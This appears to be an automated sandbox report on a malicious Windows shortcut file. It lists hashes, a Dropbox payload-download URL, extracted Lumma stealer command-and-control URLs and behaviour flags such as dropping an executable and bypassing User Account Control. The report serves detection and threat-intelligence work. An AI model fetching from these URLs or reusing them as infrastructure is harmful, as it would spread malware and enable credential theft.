General
-
Target
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
-
Size
1KB
-
Sample
240227-f2e8hahb85
-
MD5
c7945d1c593363055616d6e427b8e2a2
-
SHA1
2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b
-
SHA256
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
-
SHA512
7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19
Static task
static1
Behavioral task
behavioral1
Sample
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Resource
win7-20240221-en
Malware Config
Extracted
https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
Extracted
https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
Extracted
lumma
https://executivebrakeji.shop/api
https://technologyenterdo.shop/api
https://detectordiscusser.shop/api
https://turkeyunlikelyofw.shop/api
https://associationokeo.shop/api
Targets
-
-
Target
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
-
Size
1KB
-
MD5
c7945d1c593363055616d6e427b8e2a2
-
SHA1
2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b
-
SHA256
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
-
SHA512
7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Drops desktop.ini file(s)
-
Suspicious use of SetThreadContext
-
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1